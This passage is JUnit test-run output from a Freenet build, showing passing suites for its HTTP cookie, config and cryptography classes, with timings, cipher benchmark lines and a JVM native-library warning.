    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,581 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,581 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSendSynchronousThreadSafety took 1,052 sec
    [junit] Running freenet.clients.fcp.FCPPluginMessageEncodeDecodeTest
    [junit] Testsuite: freenet.clients.fcp.FCPPluginMessageEncodeDecodeTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,883 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,883 sec
    [junit] 
    [junit] Testcase: testEncodeDecode took 0,43 sec
    [junit] Running freenet.clients.http.CookieTest
    [junit] Testsuite: freenet.clients.http.CookieTest
    [junit] sessionid=abCd12345;version=1;path=/Freetalk;expires=Sat, 02 Apr 2016 15:26:46 GMT;discard=true;
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,793 sec
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,793 sec
    [junit] ------------- Standard Output ---------------
    [junit] sessionid=abCd12345;version=1;path=/Freetalk;expires=Sat, 02 Apr 2016 15:26:46 GMT;discard=true;
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testGetValue took 0,074 sec
    [junit] Testcase: testEncodeToHeaderValue took 0,007 sec
    [junit] Testcase: testGetName took 0,001 sec
    [junit] Testcase: testGetPath took 0,002 sec
    [junit] Testcase: testCookieURIStringStringDate took 0,07 sec
    [junit] Testcase: testEqualsObject took 0,007 sec
    [junit] Testcase: testGetDomain took 0,001 sec
    [junit] Running freenet.clients.http.FilterCSSIdentifierTest
    [junit] Testsuite: freenet.clients.http.FilterCSSIdentifierTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,595 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,595 sec
    [junit] 
    [junit] Testcase: testInvalidFirstDash took 0,082 sec
    [junit] Testcase: testInvalidChar took 0,001 sec
    [junit] Testcase: testKnownValid took 0,003 sec
    [junit] Running freenet.clients.http.ReceivedCookieTest
    [junit] Testsuite: freenet.clients.http.ReceivedCookieTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,08 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,08 sec
    [junit] 
    [junit] Testcase: testParseHeader took 0,232 sec
    [junit] Testcase: testEncodeToHeaderValue took 0,002 sec
    [junit] Testcase: testGetDomain took 0,002 sec
    [junit] Testcase: testGetValue took 0,003 sec
    [junit] Testcase: testGetName took 0,002 sec
    [junit] Testcase: testGetPath took 0,002 sec
    [junit] Testcase: testCookieURIStringStringDate took 0,049 sec
    [junit] Testcase: testEqualsObject took 0,004 sec
    [junit] Running freenet.config.ConfigTest
    [junit] Testsuite: freenet.config.ConfigTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,188 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,188 sec
    [junit] 
    [junit] Testcase: testGet took 0,217 sec
    [junit] Testcase: testRegister took 0,428 sec
    [junit] Testcase: testConfig took 0,001 sec
    [junit] Testcase: testGetConfigs took 0,002 sec
    [junit] Running freenet.crypt.AEADBucketTest
    [junit] Testsuite: freenet.crypt.AEADBucketTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,009 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,009 sec
    [junit] 
    [junit] Testcase: testCopyBucketNotDivisibleBy16 took 0,564 sec
    [junit] Running freenet.crypt.AEADStreamsTest
    [junit] Testsuite: freenet.crypt.AEADStreamsTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,031 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,031 sec
    [junit] 
    [junit] Testcase: testCorruptedRoundTrip took 2,279 sec
    [junit] Testcase: testGarbageAfterClose took 0,172 sec
    [junit] Testcase: testSuccessfulRoundTrip took 0,641 sec
    [junit] Testcase: testCloseEarly took 0,012 sec
    [junit] Testcase: testTruncatedReadsWritesRoundTrip took 0,455 sec
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12297089ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12260651ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Running freenet.crypt.CTRBlockCipherTest
    [junit] Testsuite: freenet.crypt.CTRBlockCipherTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 14,94 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 14,94 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12297089ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12260651ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testNISTRandomLength took 9,858 sec
    [junit] Testcase: testNIST took 0,002 sec
    [junit] Testcase: testRandomJCA took 1,227 sec
    [junit] Testcase: testRandom took 3,371 sec
    [junit] Running freenet.crypt.CryptByteBufferTest
    [junit] Testsuite: freenet.crypt.CryptByteBufferTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12398804ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12373630ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 30, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,693 sec
    [junit] Tests run: 30, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,693 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12398804ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12373630ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSuccessfulRoundTripByteArrayNewInstance took 8,107 sec
    [junit] Testcase: testSetIVIvParameterSpec took 0,062 sec
    [junit] Testcase: testEncryptWrapByteBuffer took 0,027 sec
    [junit] Testcase: testEncryptByteArrayIntIntOffsetOutOfBounds took 0,009 sec
    [junit] Testcase: testEncryptByteArrayIntIntLengthOutOfBounds took 0,009 sec
    [junit] Testcase: testGenIV took 0,002 sec
    [junit] Testcase: testGetIV took 0,004 sec
    [junit] Testcase: testGenIVLength took 0,002 sec
    [junit] Testcase: testGenIVUnsupportedTypeException took 0,001 sec
    [junit] Testcase: testEncryptByteBufferToByteBufferDirect took 0,015 sec
    [junit] Testcase: testDecryptByteArrayNullInput took 0,013 sec
    [junit] Testcase: testRoundRandomLengthBytes took 0,11 sec
    [junit] Testcase: testSetIVIvParameterSpecNullInput took 0,002 sec
    [junit] Testcase: testSuccessfulRoundTripByteArrayReset took 0,018 sec
    [junit] Testcase: testSuccessfulRoundTripInPlace took 0,013 sec
    [junit] Testcase: testDecryptByteArrayIntIntNullInput took 0,042 sec
    [junit] Testcase: testOverlappingDecode took 0,065 sec
    [junit] Testcase: testEncryptDirectByteBuffer took 0,056 sec
    [junit] Testcase: testOverlappingEncode took 0,051 sec
    [junit] Testcase: testEncryptByteBufferToByteBuffer took 0,02 sec
    [junit] Testcase: testRoundOneByte took 0,04 sec
    [junit] Testcase: testSuccessfulRoundTripInPlaceOffset took 0,038 sec
    [junit] Testcase: testEncryptByteArrayIntIntNullInput took 0,024 sec
    [junit] Testcase: testEncryptByteArrayNullInput took 0,011 sec
    [junit] Testcase: testSetIVIvParameterSpecUnsupportedTypeException took 0,015 sec
    [junit] Testcase: testSuccessfulRoundTripByteArray took 0,04 sec
    [junit] Testcase: testDecryptByteArrayIntIntOffsetOutOfBounds took 0,022 sec
    [junit] Testcase: testSuccessfulRoundTripOutOfPlaceOffset took 0,034 sec
    [junit] Testcase: testDecryptWrapByteBuffer took 0,025 sec
    [junit] Testcase: testDecryptByteArrayIntIntLengthOutOfBounds took 0,027 sec
    [junit] Running freenet.crypt.CryptUtilTest
    [junit] Testsuite: freenet.crypt.CryptUtilTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi2947201881134795957lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,78 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,78 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testRandomBytes took 2,019 sec
    [junit] Testcase: testSecureRandomBytes took 0,268 sec
    [junit] Running freenet.crypt.DSAGroupGeneratorTest
    [junit] Testsuite: freenet.crypt.DSAGroupGeneratorTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,657 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,657 sec
    [junit] 
    [junit] Testcase: testIsPrime took 0,17 sec
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi6138669811090174832lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Running freenet.crypt.DSATest
    [junit] Testsuite: freenet.crypt.DSATest
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,221 sec
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,221 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSign_grp_pvtKey_r_kInv_m_rand took 0,027 sec
    [junit] Testcase: testSameSignConsistency took 0,02 sec
    [junit] Testcase: testSign_grp_pvtKey_m_rand took 0,126 sec
    [junit] Testcase: testSign_grp_pvtKey_k_m_rand took 0,551 sec
    [junit] Testcase: testSignAndVerify took 0,006 sec
    [junit] Testcase: testSignSmallQValue took 0,007 sec
    [junit] Testcase: testVerify took 0,003 sec
    [junit] Running freenet.crypt.ECDHTest
    [junit] Testsuite: freenet.crypt.ECDHTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,886 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,886 sec
    [junit] 
    [junit] Testcase: testGetPublicKey took 3,224 sec
    [junit] Testcase: testGetAgreedSecret took 0,18 sec
    [junit] Running freenet.crypt.ECDSATest
    [junit] Testsuite: freenet.crypt.ECDSATest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,025 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,025 sec
    [junit] 
    [junit] Testcase: testGetPublicKey took 6,476 sec
    [junit] Testcase: testSign took 0,316 sec
    [junit] Testcase: testAsFieldSet took 0,184 sec
    [junit] Testcase: testSignToNetworkFormat took 0,157 sec
    [junit] Testcase: testVerify took 0,323 sec
    [junit] Testcase: testSerializeUnserialize took 0,045 sec
    [junit] Running freenet.crypt.EncryptedRandomAccessBucketTest
    [junit] Testsuite: freenet.crypt.EncryptedRandomAccessBucketTest
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,694 sec
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,694 sec
    [junit] 
    [junit] Testcase: testIrregularWritesNotOverlapping took 1,214 sec
    [junit] Testcase: testBucketToRAF took 1,14 sec
    [junit] Testcase: testSerialize took 0,363 sec
    [junit] Testcase: testIrregularWrites took 0,034 sec
    [junit] Testcase: testStoreTo took 0,104 sec
    [junit] Testcase: testReadExcess took 0,03 sec
    [junit] Testcase: testReuse took 0,034 sec
    [junit] Testcase: testReadEmpty took 0,01 sec
    [junit] Testcase: testReadWrite took 0,053 sec
    [junit] Testcase: testLargeData took 0,23 sec
    [junit] Testcase: testNegative took 0,009 sec
    [junit] Running freenet.crypt.EncryptedRandomAccessBufferAltTest
    [junit] Testsuite: freenet.crypt.EncryptedRandomAccessBufferAltTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 18,923 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 18,923 sec
    [junit] 
    [junit] Testcase: testArray took 16,49 sec
    [junit] Testcase: testClose took 0,06 sec
    [junit] Testcase: testSize took 0,104 sec
    [junit] Testcase: testFormula took 1,409 sec
    [junit] Testcase: testWriteOverLimit took 0,424 sec
    [junit] Running freenet.crypt.EncryptedRandomAccessBufferTest
    [junit] Testsuite: freenet.crypt.EncryptedRandomAccessBufferTest
    [junit] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,649 sec
    [junit] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,649 sec
    [junit] 
    [junit] Testcase: testSuccesfulRoundTrip took 0,722 sec
    [junit] Testcase: testClose took 0,026 sec
    [junit] Testcase: testSize took 0,038 sec
    [junit] Testcase: testSuccesfulRoundTripReadHeader took 0,107 sec
    [junit] Testcase: testClosePwrite took 0,094 sec
    [junit] Testcase: testWrongMagic took 0,025 sec
    [junit] Testcase: testPreadFileOffsetTooSmall took 0,018 sec
    [junit] Testcase: testPreadFileOffsetTooBig took 0,013 sec
    [junit] Testcase: testUnderlyingRandomAccessThingTooSmall took 0,005 sec
    [junit] Testcase: testSerialize took 0,418 sec
    [junit] Testcase: testEncryptedRandomAccessThingNullInput1 took 0,002 sec
    [junit] Testcase: testEncryptedRandomAccessThingNullInput3 took 0,011 sec
    [junit] Testcase: testWrongMasterSecret took 0,053 sec
    [junit] Testcase: testPwriteFileOffsetTooBig took 0,037 sec
    [junit] Testcase: testEncryptedRandomAccessThingNullBARAT took 0,014 sec
    [junit] Testcase: testWrongERATType took 0,061 sec
    [junit] Testcase: testEncryptedRandomAccessThingNullByteArray took 0,015 sec
    [junit] Testcase: testPwriteFileOffsetTooSmall took 0,021 sec
    [junit] Testcase: testClosePread took 0,023 sec
    [junit] Testcase: testStoreTo took 0,157 sec
    [junit] Running freenet.crypt.EncryptingIoAdapterTest
    [junit] Testsuite: freenet.crypt.EncryptingIoAdapterTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12276495ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12260849ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 58,147 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 58,147 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12276495ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12260849ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testFlatRandom took 10,436 sec
    [junit] Testcase: testClobberBuffer took 0,004 sec
    [junit] Testcase: testMirrored took 4,755 sec
    [junit] Testcase: testLinear took 42,44 sec
    [junit] Running freenet.crypt.HMACTest
    [junit] Testsuite: freenet.crypt.HMACTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,299 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,299 sec
    [junit] 
    [junit] Testcase: testWrongKeySize took 1,111 sec
    [junit] Testcase: testAllCipherNames took 0,345 sec
    [junit] Testcase: testBenchmark took 0,202 sec
    [junit] Testcase: testKnownVectors took 0,092 sec
    [junit] Testcase: testSHA256SignVerify took 0,083 sec
    [junit] Running freenet.crypt.KeyGenUtilsTest
    [junit] Testsuite: freenet.crypt.KeyGenUtilsTest
    [junit] 16
    [junit] 32
    [junit] 16
    [junit] 32
    [junit] 32
    [junit] 48
    [junit] 64
    [junit] 32
    [junit] 16
    [junit] 32
    [junit] Tests run: 47, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,439 sec
    [junit] Tests run: 47, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,439 sec
    [junit] ------------- Standard Output ---------------
    [junit] 16
    [junit] 32
    [junit] 16
    [junit] 32
    [junit] 32
    [junit] 48
    [junit] 64
    [junit] 32
    [junit] 16
    [junit] 32
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testGetPublicKeyPairNotNull took 0,019 sec
    [junit] Testcase: testGetPublicKeyNullInput1 took 0,001 sec
    [junit] Testcase: testGetPublicKeyNullInput2 took 0,001 sec
    [junit] Testcase: testGetPublicKeyPairNullInput1 took 0,001 sec
    [junit] Testcase: testGetPublicKeyPairNullInput2 took 0 sec
    [junit] Testcase: testDeriveIvParameterSpec took 0,074 sec
    [junit] Testcase: testGenNonceLength took 0,103 sec
    [junit] Testcase: testGenSecretKeyKeySize took 0,636 sec
    [junit] Testcase: testGetPublicKey took 0,024 sec
    [junit] Testcase: testGetPublicKeyPair took 0,03 sec
    [junit] Testcase: testGetPublicKeyDSAType took 0,007 sec
    [junit] Testcase: testGenIV took 0,014 sec
    [junit] Testcase: testGenKeyPairPublicKeyLength took 0,21 sec
    [junit] Testcase: testGetIvParameterSpecOffsetOutOfBounds took 0 sec
    [junit] Testcase: testGetIvParameterSpecLengthOutOfBounds took 0,001 sec
    [junit] Testcase: testGetKeyPairPublicKeyPrivateKey took 0 sec
    [junit] Testcase: testDeriveSecretKey took 0,043 sec
    [junit] Testcase: testGetSecretKeyNullInput1 took 0,001 sec
    [junit] Testcase: testGetSecretKeyNullInput2 took 0,001 sec
    [junit] Testcase: testGenKeyPairNullInput took 0,001 sec
    [junit] Testcase: testGetIvParameterSpecLength took 0,001 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayNullInput1 took 0 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayNullInput2 took 0,022 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayNullInput3 took 0,028 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayByteArray took 0,035 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayDSAType took 0,001 sec
    [junit] Testcase: testGenSecretKeyNullInput took 0,001 sec
    [junit] Testcase: testDeriveSecretKeyLength took 0,143 sec
    [junit] Testcase: testGetKeyPairPublicKeyPrivateKeySamePrivate took 0,001 sec
    [junit] Testcase: testGetSecretKey took 0,009 sec
    [junit] Testcase: testDeriveSecretKeyNullInput1 took 0,051 sec
    [junit] Testcase: testDeriveSecretKeyNullInput2 took 0,001 sec
    [junit] Testcase: testDeriveSecretKeyNullInput3 took 0 sec
    [junit] Testcase: testDeriveSecretKeyNullInput4 took 0,001 sec
    [junit] Testcase: testGenNonceNegativeLength took 0 sec
    [junit] Testcase: testDeriveIvParameterSpecLength took 0,119 sec
    [junit] Testcase: testDeriveIvParameterSpecNullInput1 took 0,002 sec
    [junit] Testcase: testDeriveIvParameterSpecNullInput2 took 0,001 sec
    [junit] Testcase: testDeriveIvParameterSpecNullInput3 took 0 sec
    [junit] Testcase: testDeriveIvParameterSpecNullInput4 took 0,001 sec
    [junit] Testcase: testGenKeyPairDSAType took 0 sec
    [junit] Testcase: testGetPublicKeyPairDSAType took 0 sec
    [junit] Testcase: testGetIvParameterSpecNullInput took 0,001 sec
    [junit] Testcase: testGenIVNegativeLength took 0 sec
    [junit] Testcase: testGenSecretKey took 0,006 sec
    [junit] Testcase: testGetKeyPairPublicKeyPrivateKeySamePublic took 0,001 sec
    [junit] Testcase: testGenKeyPair took 0,034 sec
    [junit] Running freenet.crypt.MasterSecretTest
    [junit] Testsuite: freenet.crypt.MasterSecretTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,306 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,306 sec
    [junit] 
    [junit] Testcase: testDeriveKeyLength took 0,639 sec
    [junit] Testcase: testDeriveKeyNullInput took 0,002 sec
    [junit] Testcase: testDeriveIvLength took 0,081 sec
    [junit] Testcase: testDeriveKey took 0,039 sec
    [junit] Testcase: testDeriveIvNullInput took 0,002 sec
    [junit] Testcase: testDeriveIv took 0,01 sec
    [junit] Running freenet.crypt.MessageAuthCodeTest
    [junit] Testsuite: freenet.crypt.MessageAuthCodeTest
    [junit] HMACSHA256
    [junit] HMACSHA384
    [junit] HMACSHA512
    [junit] Poly1305AES
    [junit] Tests run: 29, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,935 sec
    [junit] Tests run: 29, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,935 sec
    [junit] ------------- Standard Output ---------------
    [junit] HMACSHA256
    [junit] HMACSHA384
    [junit] HMACSHA512
    [junit] Poly1305AES
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSetIVIvParameterSpec took 0,868 sec
    [junit] Testcase: testAddBytesByteBufferNullInput took 0,01 sec
    [junit] Testcase: testVerifyData took 0,072 sec
    [junit] Testcase: testVerifyDataNullInput1 took 0,016 sec
    [junit] Testcase: testVerifyDataNullInput2 took 0,005 sec
    [junit] Testcase: testAddByte took 0,031 sec
    [junit] Testcase: testAddBytesByteArrayIntIntNullInput took 0,003 sec
    [junit] Testcase: testGenIV took 0,001 sec
    [junit] Testcase: testGetIV took 0,001 sec
    [junit] Testcase: testGenIVLength took 0,002 sec
    [junit] Testcase: testGenIVUnsupportedTypeException took 0,002 sec
    [junit] Testcase: testVerifyNullInput1 took 0,001 sec
    [junit] Testcase: testVerifyNullInput2 took 0,001 sec
    [junit] Testcase: testGetMacByteArrayArray took 0,013 sec
    [junit] Testcase: testGetMacByteArrayArrayNullInput took 0,003 sec
    [junit] Testcase: testVerifyDataFalse took 0,012 sec
    [junit] Testcase: testSetIVIvParameterSpecNullInput took 0,001 sec
    [junit] Testcase: testAddBytesByteBuffer took 0,029 sec
    [junit] Testcase: testGetIVUnsupportedTypeException took 0,002 sec
    [junit] Testcase: testAddBytesByteArrayIntIntOffsetOutOfBounds took 0,003 sec
    [junit] Testcase: testAddBytesByteArrayIntIntLengthOutOfBounds took 0,012 sec
    [junit] Testcase: testAddByteNullInput took 0,006 sec
    [junit] Testcase: testAddBytesByteArrayIntInt took 0,041 sec
    [junit] Testcase: testGetMacByteArrayArrayNullMatrixElementInput took 0,004 sec
    [junit] Testcase: testGetKey took 0,009 sec
    [junit] Testcase: testVerifyFalse took 0 sec
    [junit] Testcase: testGetMacByteArrayArrayReset took 0,018 sec
    [junit] Testcase: testSetIVIvParameterSpecUnsupportedTypeException took 0,001 sec
    [junit] Testcase: testVerify took 0 sec
    [junit] Running freenet.crypt.PCFBModeTest
    [junit] Testsuite: freenet.crypt.PCFBModeTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12391033ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12306733ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,715 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,715 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12391033ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12306733ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testKnownValues took 7,73 sec
    [junit] Testcase: testKnownValuesRandomLength took 2,027 sec
    [junit] Testcase: testRandom took 1,476 sec
    [junit] Running freenet.crypt.TrivialPaddedBucketTest
    [junit] Testsuite: freenet.crypt.TrivialPaddedBucketTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,342 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,342 sec
    [junit] 
    [junit] Testcase: testSimple took 0,872 sec
    [junit] Running freenet.crypt.YarrowTest
    [junit] Testsuite: freenet.crypt.YarrowTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi1400214721143539532lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12111166ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12287327ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,909 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,909 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12111166ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12287327ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testNextBoolean took 9,322 sec
    [junit] Testcase: testDouble took 0,087 sec
    [junit] Testcase: testNextInt took 0,011 sec
    [junit] Running freenet.crypt.ciphers.RijndaelTest
    [junit] Testsuite: freenet.crypt.ciphers.RijndaelTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12295028ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12280510ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 13,422 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 13,422 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12295028ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12280510ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testGladmanTestVectors took 12,014 sec
    [junit] Testcase: testNonStandardTestVK took 0,01 sec
    [junit] Testcase: testStandardTestVKJCA took 0,242 sec
    [junit] Testcase: testKnownValue took 0,001 sec
    [junit] Testcase: testStandardTestVK took 0,019 sec
    [junit] Testcase: testRandom took 0,672 sec
    [junit] Running freenet.io.AddressIdentifierTest
    [junit] Testsuite: freenet.io.AddressIdentifierTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,535 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,535 sec
    [junit] 
    [junit] Testcase: test took 0,045 sec
    [junit] Testcase: testIsAnISATAPIPv6Address took 0,002 sec
    [junit] Running freenet.io.Inet4AddressMatcherTest
    [junit] Testsuite: freenet.io.Inet4AddressMatcherTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,506 sec
